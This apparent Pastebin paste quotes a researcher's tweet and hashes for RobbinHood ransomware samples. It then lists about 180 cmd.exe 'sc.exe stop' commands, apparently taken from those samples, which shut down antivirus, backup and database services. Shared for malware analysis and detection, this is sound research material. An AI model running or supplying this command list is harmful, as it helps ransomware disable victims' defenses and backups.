API tools faq
paste
Advertisement
cephurs

robbinhood kills av

cephurs
Jun 5th, 2019
641
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 8.00 KB | None | 0 0
raw download clone embed print report diff
  1. https://twitter.com/joakimkennedy/status/1136262046780153856
  2. Can confirm that #RobbinHood does not use any exploits. Functions of the samples with the bitcoin addresses reported, attached. Kill a lot of AV products: (link: https://pastebin.com/3narnyr0) pastebin.com/3narnyr0
  3. 8c2a236877dd2b707c7b940276028e40
  4. d80a899168e859c4daea95b64f90645c
  5. 8c2a236877dd2b707c7b940276028e40
  6.  
  7. cmd.exe /c sc.exe stop \"Acronis VSS Provider\" /y
  8. cmd.exe /c sc.exe stop \"Enterprise Client Service\" /y
  9. cmd.exe /c sc.exe stop \"Sophos Agent\" /y
  10. cmd.exe /c sc.exe stop \"Sophos AutoUpdate Service\" /y
  11. cmd.exe /c sc.exe stop \"Sophos Clean Service\" /y
  12. cmd.exe /c sc.exe stop \"Sophos Device Control Service\" /y
  13. cmd.exe /c sc.exe stop \"Sophos File Scanner Service\" /y
  14. cmd.exe /c sc.exe stop \"Sophos Health Service\" /y
  15. cmd.exe /c sc.exe stop \"Sophos MCS Agent\" /y
  16. cmd.exe /c sc.exe stop \"Sophos Message Router\" /y
  17. cmd.exe /c sc.exe stop \"Sophos Safestore Service\" /y
  18. cmd.exe /c sc.exe stop \"Sophos System Protection Service\" /y
  19. cmd.exe /c sc.exe stop \"Sophos Web Control Service\" /y
  20. cmd.exe /c sc.exe stop \"SQLsafe Backup Service\" /y
  21. cmd.exe /c sc.exe stop \"Symantec System Recovery\" /y
  22. cmd.exe /c sc.exe stop \"Veeam Backup Catalog Data Service\" /y
  23. cmd.exe /c sc.exe stop AcronisAgent /y
  24. cmd.exe /c sc.exe stop AcrSch2Svc /y
  25. cmd.exe /c sc.exe stop Antivirus /y
  26. cmd.exe /c sc.exe stop ARSM /y
  27. cmd.exe /c sc.exe stop BackupExecAgentAccelerator /y
  28. cmd.exe /c sc.exe stop BackupExecAgentBrowser /y
  29. cmd.exe /c sc.exe stop BackupExecDeviceMediaService /y
  30. cmd.exe /c sc.exe stop BackupExecJobEngine /y
  31. cmd.exe /c sc.exe stop BackupExecManagementService /y
  32. cmd.exe /c sc.exe stop BackupExecRPCService /y
  33. cmd.exe /c sc.exe stop BackupExecVSSProvider /y
  34. cmd.exe /c sc.exe stop bedbg /y
  35. cmd.exe /c sc.exe stop DCAgent /y
  36. cmd.exe /c sc.exe stop EPSecurityService /y
  37. cmd.exe /c sc.exe stop EPUpdateService /y
  38. cmd.exe /c sc.exe stop EraserSvc11710 /y
  39. cmd.exe /c sc.exe stop EsgShKernel /y
  40. cmd.exe /c sc.exe stop FA_Scheduler /y
  41. cmd.exe /c sc.exe stop IISAdmin /y
  42. cmd.exe /c sc.exe stop IMAP4Svc /y
  43. cmd.exe /c sc.exe stop macmnsvc /y
  44. cmd.exe /c sc.exe stop masvc /y
  45. cmd.exe /c sc.exe stop MBAMService /y
  46. cmd.exe /c sc.exe stop MBEndpointAgent /y
  47. cmd.exe /c sc.exe stop McAfeeEngineService /y
  48. cmd.exe /c sc.exe stop McAfeeFramework /y
  49. cmd.exe /c sc.exe stop McAfeeFrameworkMcAfeeFramework /y
  50. cmd.exe /c sc.exe stop McShield /y
  51. cmd.exe /c sc.exe stop McTaskManager /y
  52. cmd.exe /c sc.exe stop mfemms /y
  53. cmd.exe /c sc.exe stop mfevtp /y
  54. cmd.exe /c sc.exe stop MMS /y
  55. cmd.exe /c sc.exe stop mozyprobackup /y
  56. cmd.exe /c sc.exe stop MsDtsServer /y
  57. cmd.exe /c sc.exe stop MsDtsServer100 /y
  58. cmd.exe /c sc.exe stop MsDtsServer110 /y
  59. cmd.exe /c sc.exe stop MSExchangeES /y
  60. cmd.exe /c sc.exe stop MSExchangeIS /y
  61. cmd.exe /c sc.exe stop MSExchangeMGMT /y
  62. cmd.exe /c sc.exe stop MSExchangeMTA /y
  63. cmd.exe /c sc.exe stop MSExchangeSA /y
  64. cmd.exe /c sc.exe stop MSExchangeSRS /y
  65. cmd.exe /c sc.exe stop MSOLAP$SQL_2008 /y
  66. cmd.exe /c sc.exe stop MSOLAP$SYSTEM_BGC /y
  67. cmd.exe /c sc.exe stop MSOLAP$TPS /y
  68. cmd.exe /c sc.exe stop MSOLAP$TPSAMA /y
  69. cmd.exe /c sc.exe stop MSSQL$BKUPEXEC /y
  70. cmd.exe /c sc.exe stop MSSQL$ECWDB2 /y
  71. cmd.exe /c sc.exe stop MSSQL$PRACTICEMGT /y
  72. cmd.exe /c sc.exe stop MSSQL$PRACTTICEBGC /y
  73. cmd.exe /c sc.exe stop MSSQL$PROFXENGAGEMENT /y
  74. cmd.exe /c sc.exe stop MSSQL$SBSMONITORING /y
  75. cmd.exe /c sc.exe stop MSSQL$SHAREPOINT /y
  76. cmd.exe /c sc.exe stop MSSQL$SQL_2008 /y
  77. cmd.exe /c sc.exe stop MSSQL$SYSTEM_BGC /y
  78. cmd.exe /c sc.exe stop MSSQL$TPS /y
  79. cmd.exe /c sc.exe stop MSSQL$TPSAMA /y
  80. cmd.exe /c sc.exe stop MSSQL$VEEAMSQL2008R2 /y
  81. cmd.exe /c sc.exe stop MSSQL$VEEAMSQL2012 /y
  82. cmd.exe /c sc.exe stop MSSQLFDLauncher /y
  83. cmd.exe /c sc.exe stop MSSQLFDLauncher$PROFXENGAGEMENT /y
  84. cmd.exe /c sc.exe stop MSSQLFDLauncher$SBSMONITORING /y
  85. cmd.exe /c sc.exe stop MSSQLFDLauncher$SHAREPOINT /y
  86. cmd.exe /c sc.exe stop MSSQLFDLauncher$SQL_2008 /y
  87. cmd.exe /c sc.exe stop MSSQLFDLauncher$SYSTEM_BGC /y
  88. cmd.exe /c sc.exe stop MSSQLFDLauncher$TPS /y
  89. cmd.exe /c sc.exe stop MSSQLFDLauncher$TPSAMA /y
  90. cmd.exe /c sc.exe stop MSSQLSERVER /y
  91. cmd.exe /c sc.exe stop MSSQLServerADHelper100 /y
  92. cmd.exe /c sc.exe stop MSSQLServerOLAPService /y
  93. cmd.exe /c sc.exe stop MySQL80 /y
  94. cmd.exe /c sc.exe stop MySQL57 /y
  95. cmd.exe /c sc.exe stop ntrtscan /y
  96. cmd.exe /c sc.exe stop OracleClientCache80 /y
  97. cmd.exe /c sc.exe stop PDVFSService /y
  98. cmd.exe /c sc.exe stop POP3Svc /y
  99. cmd.exe /c sc.exe stop ReportServer /y
  100. cmd.exe /c sc.exe stop ReportServer$SQL_2008 /y
  101. cmd.exe /c sc.exe stop ReportServer$SYSTEM_BGC /y
  102. cmd.exe /c sc.exe stop ReportServer$TPS /y
  103. cmd.exe /c sc.exe stop ReportServer$TPSAMA /y
  104. cmd.exe /c sc.exe stop RESvc /y
  105. cmd.exe /c sc.exe stop sacsvr /y
  106. cmd.exe /c sc.exe stop SamSs /y
  107. cmd.exe /c sc.exe stop SAVAdminService /y
  108. cmd.exe /c sc.exe stop SAVService /y
  109. cmd.exe /c sc.exe stop SDRSVC /y
  110. cmd.exe /c sc.exe stop SepMasterService /y
  111. cmd.exe /c sc.exe stop ShMonitor /y
  112. cmd.exe /c sc.exe stop Smcinst /y
  113. cmd.exe /c sc.exe stop SmcService /y
  114. cmd.exe /c sc.exe stop SMTPSvc /y
  115. cmd.exe /c sc.exe stop SNAC /y
  116. cmd.exe /c sc.exe stop SntpService /y
  117. cmd.exe /c sc.exe stop sophossps /y
  118. cmd.exe /c sc.exe stop SQLAgent$BKUPEXEC /y
  119. cmd.exe /c sc.exe stop SQLAgent$ECWDB2 /y
  120. cmd.exe /c sc.exe stop SQLAgent$PRACTTICEBGC /y
  121. cmd.exe /c sc.exe stop SQLAgent$PRACTTICEMGT /y
  122. cmd.exe /c sc.exe stop SQLAgent$PROFXENGAGEMENT /y
  123. cmd.exe /c sc.exe stop SQLAgent$SBSMONITORING /y
  124. cmd.exe /c sc.exe stop SQLAgent$SHAREPOINT /y
  125. cmd.exe /c sc.exe stop SQLAgent$SQL_2008 /y
  126. cmd.exe /c sc.exe stop SQLAgent$SYSTEM_BGC /y
  127. cmd.exe /c sc.exe stop SQLAgent$TPS /y
  128. cmd.exe /c sc.exe stop SQLAgent$TPSAMA /y
  129. cmd.exe /c sc.exe stop SQLAgent$VEEAMSQL2008R2 /y
  130. cmd.exe /c sc.exe stop SQLAgent$VEEAMSQL2012 /y
  131. cmd.exe /c sc.exe stop SQLBrowser /y
  132. cmd.exe /c sc.exe stop SQLSafeOLRService /y
  133. cmd.exe /c sc.exe stop SQLSERVERAGENT /y
  134. cmd.exe /c sc.exe stop SQLTELEMETRY /y
  135. cmd.exe /c sc.exe stop SQLWriter /y
  136. cmd.exe /c sc.exe stop SstpSvc /y
  137. cmd.exe /c sc.exe stop svcGenericHost /y
  138. cmd.exe /c sc.exe stop swi_filter /y
  139. cmd.exe /c sc.exe stop swi_service /y
  140. cmd.exe /c sc.exe stop swi_update_64 /y
  141. cmd.exe /c sc.exe stop TmCCSF /y
  142. cmd.exe /c sc.exe stop tmlisten /y
  143. cmd.exe /c sc.exe stop TrueKey /y
  144. cmd.exe /c sc.exe stop TrueKeyScheduler /y
  145. cmd.exe /c sc.exe stop TrueKeyServiceHelper /y
  146. cmd.exe /c sc.exe stop UI0Detect /y
  147. cmd.exe /c sc.exe stop VeeamBackupSvc /y
  148. cmd.exe /c sc.exe stop VeeamBrokerSvc /y
  149. cmd.exe /c sc.exe stop VeeamCatalogSvc /y
  150. cmd.exe /c sc.exe stop VeeamCloudSvc /y
  151. cmd.exe /c sc.exe stop VeeamDeploymentService /y
  152. cmd.exe /c sc.exe stop VeeamDeploySvc /y
  153. cmd.exe /c sc.exe stop VeeamEnterpriseManagerSvc /y
  154. cmd.exe /c sc.exe stop VeeamMountSvc /y
  155. cmd.exe /c sc.exe stop VeeamNFSSvc /y
  156. cmd.exe /c sc.exe stop VeeamRESTSvc /y
  157. cmd.exe /c sc.exe stop VeeamTransportSvc /y
  158. cmd.exe /c sc.exe stop W3Svc /y
  159. cmd.exe /c sc.exe stop wbengine /y
  160. cmd.exe /c sc.exe stop WRSVC /y
  161. cmd.exe /c sc.exe stop MSSQL$VEEAMSQL2008R2 /y
  162. cmd.exe /c sc.exe stop SQLAgent$VEEAMSQL2008R2 /y
  163. cmd.exe /c sc.exe stop VeeamHvIntegrationSvc /y
  164. cmd.exe /c sc.exe stop swi_update /y
  165. cmd.exe /c sc.exe stop SQLAgent$CXDB /y
  166. cmd.exe /c sc.exe stop SQLAgent$CITRIX_METAFRAME /y
  167. cmd.exe /c sc.exe stop \"SQL Backups\" /y
  168. cmd.exe /c sc.exe stop MSSQL$PROD /y
  169. cmd.exe /c sc.exe stop \"Zoolz 2 Service\" /y
  170. cmd.exe /c sc.exe stop MSSQLServerADHelper /y
  171. cmd.exe /c sc.exe stop SQLAgent$PROD /y
  172. cmd.exe /c sc.exe stop msftesql$PROD /y
  173. cmd.exe /c sc.exe stop NetMsmqActivator /y
  174. cmd.exe /c sc.exe stop EhttpSrv /y
  175. cmd.exe /c sc.exe stop ekrn /y
  176. cmd.exe /c sc.exe stop ESHASRV /y
  177. cmd.exe /c sc.exe stop MSSQL$SOPHOS /y
  178. cmd.exe /c sc.exe stop SQLAgent$SOPHOS /y
  179. cmd.exe /c sc.exe stop AVP /y
  180. cmd.exe /c sc.exe stop klnagent /y
  181. cmd.exe /c sc.exe stop MSSQL$SQLEXPRESS /y
  182. cmd.exe /c sc.exe stop SQLAgent$SQLEXPRESS /y
  183. cmd.exe /c sc.exe stop wbengine /y
  184. cmd.exe /c sc.exe stop kavfsslp /y
  185. cmd.exe /c sc.exe stop KAVFSGT /y
  186. cmd.exe /c sc.exe stop KAVFS /y
  187. cmd.exe /c sc.exe stop mfefire /y
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!